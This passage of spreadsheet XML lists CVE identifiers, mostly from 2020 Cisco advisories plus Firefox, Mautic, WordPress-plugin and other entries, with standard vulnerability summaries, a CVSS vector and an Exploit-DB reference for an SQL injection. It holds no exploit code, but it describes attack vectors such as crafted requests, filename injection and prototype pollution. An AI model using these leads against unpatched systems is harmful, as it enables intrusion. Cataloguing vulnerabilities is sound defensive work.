    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by intercepting a request from a user and injecting malicious data into an HTTP header. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3461</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to obtain confidential information from an affected device. The vulnerability is due to missing authentication on a specific part of the web-based management interface. An attacker could exploit this vulnerability by sending a crafted request to the interface. A successful exploit could allow the attacker to read confidential information from an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3462</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain and modify sensitive information that is stored in the underlying database.</t>
  </si>
  <si>
    <t>CVE-2020-3463</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Webex Meetings could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected service. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected service. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3464</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco UCS Director could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate input. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need administrative credentials on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3465</t>
  </si>
  <si>
    <t>A vulnerability in Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a device to reload. The vulnerability is due to incorrect handling of certain valid, but not typical, Ethernet frames. An attacker could exploit this vulnerability by sending the Ethernet frames onto the Ethernet segment. A successful exploit could allow the attacker to cause the device to reload, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3466</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco DNA Center software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerabilities exist because the web-based management interface on an affected device does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3467</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to modify parts of the configuration on an affected device. The vulnerability is due to improper enforcement of role-based access control (RBAC) within the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to modify parts of the configuration. The modified configuration could either allow unauthorized devices onto the network or prevent authorized devices from accessing the network. To exploit this vulnerability, an attacker would need valid Read-Only Administrator credentials.</t>
  </si>
  <si>
    <t>CVE-2020-3468</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates values within SQL queries. An attacker could exploit this vulnerability by authenticating to the application and sending malicious SQL queries to an affected system. A successful exploit could allow the attacker to modify values on or return values from the underlying database or the operating system.</t>
  </si>
  <si>
    <t>CVE-2020-3470</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the API subsystem of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to execute arbitrary code with root privileges. The vulnerabilities are due to improper boundary checks for certain user-supplied input. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the API subsystem of an affected system. When this request is processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the underlying operating system (OS).</t>
  </si>
  <si>
    <t>CVE-2020-3471</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Meetings and Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to maintain bidirectional audio despite being expelled from an active Webex session. The vulnerability is due to a synchronization issue between meeting and media services on a vulnerable Webex site. An attacker could exploit this vulnerability by sending crafted requests to a vulnerable Cisco Webex Meetings or Cisco Webex Meetings Server site. A successful exploit could allow the attacker to maintain the audio connection of a Webex session despite being expelled.</t>
  </si>
  <si>
    <t>CVE-2020-3472</t>
  </si>
  <si>
    <t>A vulnerability in the contacts feature of Cisco Webex Meetings could allow an authenticated, remote attacker with a legitimate user account to access sensitive information. The vulnerability is due to improper access restrictions on users who are added within user contacts. An attacker on one Webex Meetings site could exploit this vulnerability by sending specially crafted requests to the Webex Meetings site. A successful exploit could allow the attacker to view the details of users on another Webex site, including user names and email addresses.</t>
  </si>
  <si>
    <t>CVE-2020-3473</t>
  </si>
  <si>
    <t>A vulnerability in task group assignment for a specific CLI command in Cisco IOS XR Software could allow an authenticated, local CLI shell user to elevate privileges and gain full administrative control of the device. The vulnerability is due to incorrect mapping of a command to task groups within the source code. An attacker could exploit this vulnerability by first authenticating to the local CLI shell on the device and using the CLI command to bypass the task group&amp;ndash;based checks. A successful exploit could allow the attacker to elevate privileges and perform actions on the device without authorization checks.</t>
  </si>
  <si>
    <t>CVE-2020-3474</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web management framework of Cisco IOS XE Software could allow an authenticated, remote attacker with read-only privileges to gain unauthorized read access to sensitive data or cause the web management software to hang or crash, resulting in a denial of service (DoS) condition. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3475</t>
  </si>
  <si>
    <t>CVE-2020-3476</t>
  </si>
  <si>
    <t>A vulnerability in the CLI implementation of a specific command of Cisco IOS XE Software could allow an authenticated, local attacker to overwrite arbitrary files in the underlying host file system. The vulnerability is due to insufficient validation of the parameters of a specific CLI command. An attacker could exploit this vulnerability by issuing that command with specific parameters. A successful exploit could allow the attacker to overwrite the content of any arbitrary file that resides on the underlying host file system.</t>
  </si>
  <si>
    <t>CVE-2020-3477</t>
  </si>
  <si>
    <t>A vulnerability in the CLI parser of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, local attacker to access files from the flash: filesystem. The vulnerability is due to insufficient application of restrictions during the execution of a specific command. An attacker could exploit this vulnerability by using a specific command at the command line. A successful exploit could allow the attacker to obtain read-only access to files that are located on the flash: filesystem that otherwise might not have been accessible.</t>
  </si>
  <si>
    <t>CVE-2020-3478</t>
  </si>
  <si>
    <t>A vulnerability in the REST API of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to overwrite certain files that should be restricted on an affected device. The vulnerability is due to insufficient authorization enforcement on an affected system. An attacker could exploit this vulnerability by uploading a file using the REST API. A successful exploit could allow an attacker to overwrite and upload files, which could degrade the functionality of the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3479</t>
  </si>
  <si>
    <t>A vulnerability in the implementation of Multiprotocol Border Gateway Protocol (MP-BGP) for the Layer 2 VPN (L2VPN) Ethernet VPN (EVPN) address family in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to incorrect processing of Border Gateway Protocol (BGP) update messages that contain crafted EVPN attributes. An attacker could exploit this vulnerability by sending BGP update messages with specific, malformed attributes to an affected device. A successful exploit could allow the attacker to cause an affected device to crash, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3480</t>
  </si>
  <si>
    <t>CVE-2020-3481</t>
  </si>
  <si>
    <t>A vulnerability in the EGG archive parsing module in Clam AntiVirus (ClamAV) Software versions 0.102.0 - 0.102.3 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to a null pointer dereference. An attacker could exploit this vulnerability by sending a crafted EGG file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process crash, resulting in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-3482</t>
  </si>
  <si>
    <t>A vulnerability in the Traversal Using Relays around NAT (TURN) server component of Cisco Expressway software could allow an unauthenticated, remote attacker to bypass security controls and send network traffic to restricted destinations. The vulnerability is due to improper validation of specific connection information by the TURN server within the affected software. An attacker could exploit this issue by sending specially crafted network traffic to the affected software. A successful exploit could allow the attacker to send traffic through the affected software to destinations beyond the application, possibly allowing the attacker to gain unauthorized network access.</t>
  </si>
  <si>
    <t>CVE-2020-3483</t>
  </si>
  <si>
    <t>Duo has identified and fixed an issue with the Duo Network Gateway (DNG) product in which some customer-provided SSL certificates and private keys were not excluded from logging. This issue resulted in certificate and private key information being written out in plain-text to local files on the DNG host. Any private keys logged in this way could be viewed by those with access to the DNG host operating system without any need for reversing encrypted values or similar techniques. An attacker that gained access to the DNG logs and with the ability to intercept and manipulate network traffic between a user and the DNG, could decrypt and manipulate SSL/TLS connections to the DNG and to the protected applications behind it. Duo Network Gateway (DNG) versions 1.3.3 through 1.5.7 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-3484</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an unauthenticated, remote attacker to view potentially sensitive information on an affected device. The vulnerability is due to incorrect permissions within Apache configuration. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface. A successful exploit could allow the attacker to view potentially sensitive information on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3485</t>
  </si>
  <si>
    <t>A vulnerability in the role-based access control (RBAC) functionality of the web management software of Cisco Vision Dynamic Signage Director could allow an authenticated, remote attacker to access resources that they should not be able to access and perform actions that they should not be able to perform. The vulnerability exists because the web management software does not properly handle RBAC. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to view and delete certain screen content on the system that the attacker would not normally have privileges to access.</t>
  </si>
  <si>
    <t>CVE-2020-3486</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol processing of Cisco IOS XE Software for Cisco Catalyst 9800 Series Wireless Controllers could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition of an affected device. These vulnerabilities are due to insufficient validation of CAPWAP packets. An attacker could exploit these vulnerabilities by sending a malformed CAPWAP packet to an affected device. A successful exploit could allow the attacker to cause the affected device to crash and reload, resulting in a DoS condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3487</t>
  </si>
  <si>
    <t>CVE-2020-3488</t>
  </si>
  <si>
    <t>CVE-2020-3489</t>
  </si>
  <si>
    <t>CVE-2020-3490</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an authenticated, remote attacker with administrative privileges to conduct directory traversal attacks and obtain read access to sensitive files on an affected system. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to read files on the underlying operating system with root privileges. To exploit this vulnerability, the attacker would need to have administrative privileges on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3491</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an authenticated, remote attacker with administrative privileges to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker would need to have administrative privileges on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3492</t>
  </si>
  <si>
    <t>A vulnerability in the Flexible NetFlow Version 9 packet processor of Cisco IOS XE Software for Cisco Catalyst 9800 Series Wireless Controllers and Cisco AireOS Software for Cisco Wireless LAN Controllers (WLC) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient validation of certain parameters in a Flexible NetFlow Version 9 record. An attacker could exploit this vulnerability by spoofing the address of an existing Access Point on the network and sending a Control and Provisioning of Wireless Access Points (CAPWAP) packet that includes a crafted Flexible NetFlow Version 9 record to an affected device. A successful exploit could allow the attacker to cause a process crash that would lead to a reload of the device.</t>
  </si>
  <si>
    <t>CVE-2020-3493</t>
  </si>
  <si>
    <t>CVE-2020-3494</t>
  </si>
  <si>
    <t>CVE-2020-3495</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Jabber for Windows could allow an authenticated, remote attacker to execute arbitrary code. The vulnerability is due to improper validation of message contents. An attacker could exploit this vulnerability by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages to the affected software. A successful exploit could allow the attacker to cause the application to execute arbitrary programs on the targeted system with the privileges of the user account that is running the Cisco Jabber client software, possibly resulting in arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-3496</t>
  </si>
  <si>
    <t>A vulnerability in the IPv6 packet processing engine of Cisco Small Business Smart and Managed Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient validation of incoming IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet through an affected device. A successful exploit could allow the attacker to cause the switch management CLI to stop responding, resulting in a DoS condition. This vulnerability is specific to IPv6 traffic. IPv4 traffic is not affected.</t>
  </si>
  <si>
    <t>CVE-2020-3497</t>
  </si>
  <si>
    <t>CVE-2020-3498</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Jabber software could allow an authenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of message contents. An attacker could exploit this vulnerability by sending specially crafted messages to a targeted system. A successful exploit could allow the attacker to cause the application to return sensitive authentication information to another system, possibly for use in further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-3499</t>
  </si>
  <si>
    <t>A vulnerability in the licensing service of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.The vulnerability is due to improper handling of system resource values by the affected system. An attacker could exploit this vulnerability by sending malicious requests to the targeted system. A successful exploit could allow the attacker to cause the affected system to become unresponsive, resulting in a DoS condition and preventing the management of dependent devices.</t>
  </si>
  <si>
    <t>CVE-2020-3500</t>
  </si>
  <si>
    <t>A vulnerability in the IPv6 implementation of Cisco StarOS could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient validation of incoming IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet to an affected device with the goal of reaching the vulnerable section of the input buffer. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. This vulnerability is specific to IPv6 traffic. IPv4 traffic is not affected.</t>
  </si>
  <si>
    <t>CVE-2020-3501</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the user interface of Cisco Webex Meetings Desktop App could allow an authenticated, remote attacker to obtain restricted information from other Webex users. These vulnerabilities are due to improper input validation of parameters returned to the application from a web site. An attacker with a valid Webex account could exploit these vulnerabilities by persuading a user to follow a URL that is designed to return malicious path parameters to the affected software. A successful exploit could allow the attacker to obtain restricted information from other Webex users.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-35012</t>
  </si>
  <si>
    <t>The Events Manager WordPress plugin before 5.9.8 does not sanitise and escape a parameter before using it in a SQL statement, leading to an SQL Injection</t>
  </si>
  <si>
    <t>CVE-2020-3502</t>
  </si>
  <si>
    <t>CVE-2020-3503</t>
  </si>
  <si>
    <t>A vulnerability in the file system permissions of Cisco IOS XE Software could allow an authenticated, local attacker to obtain read and write access to critical configuration or system files. The vulnerability is due to insufficient file system permissions on an affected device. An attacker could exploit this vulnerability by connecting to an affected device's guest shell, and accessing or modifying restricted files. A successful exploit could allow the attacker to view or modify restricted information or configurations that are normally not accessible to system administrators.</t>
  </si>
  <si>
    <t>CVE-2020-35037</t>
  </si>
  <si>
    <t>The Events Manager WordPress plugin before 5.9.8 does not sanitise and escape some search parameter before outputing them in pages, which could lead to Cross-Site Scripting issues</t>
  </si>
  <si>
    <t>CVE-2020-3504</t>
  </si>
  <si>
    <t>A vulnerability in the local management (local-mgmt) CLI of Cisco UCS Manager Software could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper handling of CLI command parameters. An attacker could exploit this vulnerability by executing specific commands on the local-mgmt CLI on an affected device. A successful exploit could allow the attacker to cause internal system processes to fail to terminate properly, which could result in a buildup of stuck processes and lead to slowness in accessing the UCS Manager CLI and web UI. A sustained attack may result in a restart of internal UCS Manager processes and a temporary loss of access to the UCS Manager CLI and web UI.</t>
  </si>
  <si>
    <t>CVE-2020-3505</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).</t>
  </si>
  <si>
    <t>CVE-2020-3506</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera. These vulnerabilities are due to missing checks when the IP cameras process a Cisco Discovery Protocol packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to the targeted IP camera. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).</t>
  </si>
  <si>
    <t>CVE-2020-3507</t>
  </si>
  <si>
    <t>CVE-2020-3508</t>
  </si>
  <si>
    <t>A vulnerability in the IP Address Resolution Protocol (ARP) feature of Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers with a 20-Gbps Embedded Services Processor (ESP) installed could allow an unauthenticated, adjacent attacker to cause an affected device to reload, resulting in a denial of service condition. The vulnerability is due to insufficient error handling when an affected device has reached platform limitations. An attacker could exploit this vulnerability by sending a malicious series of IP ARP messages to an affected device. A successful exploit could allow the attacker to exhaust system resources, which would eventually cause the affected device to reload.</t>
  </si>
  <si>
    <t>CVE-2020-3509</t>
  </si>
  <si>
    <t>A vulnerability in the DHCP message handler of Cisco IOS XE Software for Cisco cBR-8 Converged Broadband Routers could allow an unauthenticated, remote attacker to cause the supervisor to crash, which could result in a denial of service (DoS) condition. The vulnerability is due to insufficient error handling when DHCP version 4 (DHCPv4) messages are parsed. An attacker could exploit this vulnerability by sending a malicious DHCPv4 message to or through a WAN interface of an affected device. A successful exploit could allow the attacker to cause a reload of the affected device. Note: On Cisco cBR-8 Converged Broadband Routers, all of the following are considered WAN interfaces: 10 Gbps Ethernet interfaces 100 Gbps Ethernet interfaces Port channel interfaces that include multiple 10 and/or 100 Gbps Ethernet interfaces</t>
  </si>
  <si>
    <t>CVE-2020-3510</t>
  </si>
  <si>
    <t>A vulnerability in the Umbrella Connector component of Cisco IOS XE Software for Cisco Catalyst 9200 Series Switches could allow an unauthenticated, remote attacker to trigger a reload, resulting in a denial of service condition on an affected device. The vulnerability is due to insufficient error handling when parsing DNS requests. An attacker could exploit this vulnerability by sending a series of malicious DNS requests to an Umbrella Connector client interface of an affected device. A successful exploit could allow the attacker to cause a crash of the iosd process, which triggers a reload of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3511</t>
  </si>
  <si>
    <t>A vulnerability in the ISDN subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient input validation when the ISDN Q.931 messages are processed. An attacker could exploit this vulnerability by sending a malicious ISDN Q.931 message to an affected device. A successful exploit could allow the attacker to cause the process to crash, resulting in a reload of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-35111</t>
  </si>
  <si>
    <t>When an extension with the proxy permission registered to receive &lt;all_urls&gt;, the proxy.onRequest callback was not triggered for view-source URLs. While web content cannot navigate to such URLs, a user opening View Source could have inadvertently leaked their IP address. This vulnerability affects Firefox &lt; 84, Thunderbird &lt; 78.6, and Firefox ESR &lt; 78.6.</t>
  </si>
  <si>
    <t>CVE-2020-35112</t>
  </si>
  <si>
    <t>If a user downloaded a file lacking an extension on Windows, and then "Open"-ed it from the downloads panel, if there was an executable file in the downloads directory with the same name but with an executable extension (such as .bat or .exe) that executable would have been launched instead. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 84, Thunderbird &lt; 78.6, and Firefox ESR &lt; 78.6.</t>
  </si>
  <si>
    <t>CVE-2020-35113</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 83 and Firefox ESR 78.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 84, Thunderbird &lt; 78.6, and Firefox ESR &lt; 78.6.</t>
  </si>
  <si>
    <t>CVE-2020-35114</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 83. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 84.</t>
  </si>
  <si>
    <t>CVE-2020-3512</t>
  </si>
  <si>
    <t>A vulnerability in the PROFINET handler for Link Layer Discovery Protocol (LLDP) messages of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a crash on an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient validation of LLDP messages in the PROFINET LLDP message handler. An attacker could exploit this vulnerability by sending a malicious LLDP message to an affected device. A successful exploit could allow the attacker to cause the affected device to reload.</t>
  </si>
  <si>
    <t>CVE-2020-35121</t>
  </si>
  <si>
    <t>An issue was discovered in the Keysight Database Connector plugin before 1.5.0 for Confluence. A malicious user could insert arbitrary JavaScript into saved macro parameters that would execute when a user viewed a page with that instance of the macro.</t>
  </si>
  <si>
    <t>CVE-2020-35122</t>
  </si>
  <si>
    <t>An issue was discovered in the Keysight Database Connector plugin before 1.5.0 for Confluence. A malicious user could bypass the access controls for using a saved database connection profile to submit arbitrary SQL against a saved database connection.</t>
  </si>
  <si>
    <t>CVE-2020-35123</t>
  </si>
  <si>
    <t>In Zimbra Collaboration Suite Network Edition versions &lt; 9.0.0 P10 and 8.8.15 P17, there exists an XXE vulnerability in the saml consumer store extension, which is vulnerable to XXE attacks. This has been fixed in Zimbra Collaboration Suite Network edition 9.0.0 Patch 10 and 8.8.15 Patch 17.</t>
  </si>
  <si>
    <t>CVE-2020-35124</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the assets component of Mautic before 3.2.4 allows remote attackers to inject executable JavaScript through the Referer header of asset downloads.</t>
  </si>
  <si>
    <t>CVE-2020-35125</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the forms component of Mautic before 3.2.4 allows remote attackers to inject executable JavaScript via mautic[return] (a different attack method than CVE-2020-35124, but also related to the Referer concept).</t>
  </si>
  <si>
    <t>CVE-2020-35126</t>
  </si>
  <si>
    <t>** DISPUTED ** Typesetter CMS 5.x through 5.1 allows admins to conduct Site Title persistent XSS attacks via an Admin/Configuration URI. NOTE: the significance of this report is disputed because "admins are considered trustworthy."</t>
  </si>
  <si>
    <t>CVE-2020-35127</t>
  </si>
  <si>
    <t>Ignite Realtime Openfire 4.6.0 has plugins/bookmarks/create-bookmark.jsp Stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35128</t>
  </si>
  <si>
    <t>Mautic before 3.2.4 is affected by stored XSS. An attacker with permission to manage companies, an application feature, could attack other users, including administrators. For example, by loading an externally crafted JavaScript file, an attacker could eventually perform actions as the target user. These actions include changing the user passwords, altering user or email addresses, or adding a new administrator to the system.</t>
  </si>
  <si>
    <t>CVE-2020-35129</t>
  </si>
  <si>
    <t>Mautic before 3.2.4 is affected by stored XSS. An attacker with access to Social Monitoring, an application feature, could attack other users, including administrators. For example, an attacker could load an externally drafted JavaScript file that would allow them to eventually perform actions on the target user’s behalf, including changing the user’s password or email address or changing the attacker’s user role from a low-privileged user to an administrator account.</t>
  </si>
  <si>
    <t>CVE-2020-3513</t>
  </si>
  <si>
    <t>CVE-2020-35131</t>
  </si>
  <si>
    <t>Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php, as demonstrated by values in JSON data to the /auth/check or /auth/requestreset URI.</t>
  </si>
  <si>
    <t>CVE-2020-35132</t>
  </si>
  <si>
    <t>An XSS issue has been discovered in phpLDAPadmin before 1.2.6.2 that allows users to store malicious values that may be executed by other users at a later time via get_request in lib/function.php.</t>
  </si>
  <si>
    <t>CVE-2020-35133</t>
  </si>
  <si>
    <t>irfanView 4.56 contains an error processing parsing files of type .pcx. Which leads to out-of-bounds writing at i_view32+0xdb60.</t>
  </si>
  <si>
    <t>CVE-2020-35135</t>
  </si>
  <si>
    <t>The ultimate-category-excluder plugin before 1.2 for WordPress allows ultimate-category-excluder.php CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-35136</t>
  </si>
  <si>
    <t>Dolibarr 12.0.3 is vulnerable to authenticated Remote Code Execution. An attacker who has the access the admin dashboard can manipulate the backup function by inserting a payload into the filename for the zipfilename_template parameter to admin/tools/dolibarr_export.php.</t>
  </si>
  <si>
    <t>CVE-2020-35138</t>
  </si>
  <si>
    <t>** DISPUTED ** The MobileIron agents through 2021-03-22 for Android and iOS contain a hardcoded encryption key, used to encrypt the submission of username/password details during the authentication process, as demonstrated by Mobile@Work (aka com.mobileiron). The key is in the com/mobileiron/common/utils/C4928m.java file. NOTE: It has been asserted that there is no causality or connection between credential encryption and the MiTM attack.</t>
  </si>
  <si>
    <t>CVE-2020-3514</t>
  </si>
  <si>
    <t>A vulnerability in the multi-instance feature of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to escape the container for their Cisco FTD instance and execute commands with root privileges in the host namespace. The attacker must have valid credentials on the device.The vulnerability exists because a configuration file that is used at container startup has insufficient protections. An attacker could exploit this vulnerability by modifying a specific container configuration file on the underlying file system. A successful exploit could allow the attacker to execute commands with root privileges within the host namespace. This could allow the attacker to impact other running Cisco FTD instances or the host Cisco FXOS device.</t>
  </si>
  <si>
    <t>CVE-2020-35145</t>
  </si>
  <si>
    <t>Acronis True Image for Windows prior to 2021 Update 3 allowed local privilege escalation due to a DLL hijacking vulnerability in multiple components, aka an Untrusted Search Path issue.</t>
  </si>
  <si>
    <t>CVE-2020-35149</t>
  </si>
  <si>
    <t>lib/utils.js in mquery before 3.2.3 allows a pollution attack because a special property (e.g., __proto__) can be copied during a merge or clone operation.</t>
  </si>
  <si>
    <t>CVE-2020-3515</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49307.txt</t>
  </si>
  <si>
    <t>Online Marriage Registration System 1.0 - 'searchdata' SQL Injection</t>
  </si>
  <si>
    <t>CVE-2020-35151</t>
  </si>
  <si>
    <t>The Online Marriage Registration System 1.0 post parameter "searchdata" in the user/search.php request is vulnerable to Time Based Sql Injection.</t>
  </si>
  <si>
    <t>CVE-2020-35152</t>
  </si>
  <si>
    <t>Cloudflare WARP for Windows allows privilege escalation due to an unquoted service path. A malicious user or process running with non-administrative privileges can become an administrator by abusing the unquoted service path issue. Since version 1.2.2695.1, the vulnerability was fixed by adding quotes around the service's binary path. This issue affects Cloudflare WARP for Windows, versions prior to 1.2.2695.1.</t>
  </si>
  <si>
    <t>CVE-2020-3516</t>
  </si>
  <si>
    <t>A vulnerability in the web server authentication of Cisco IOS XE Software could allow an authenticated, remote attacker to crash the web server on the device. The vulnerability is due to insufficient input validation during authentication. An attacker could exploit this vulnerability by entering unexpected characters during a valid authentication. A successful exploit could allow the attacker to crash the web server on the device, which must be manually recovered by disabling and re-enabling the web server.</t>
  </si>
  <si>
    <t>CVE-2020-35163</t>
  </si>
  <si>
    <t>Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain a Use of Insufficiently Random Values Vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35164</t>
  </si>
  <si>
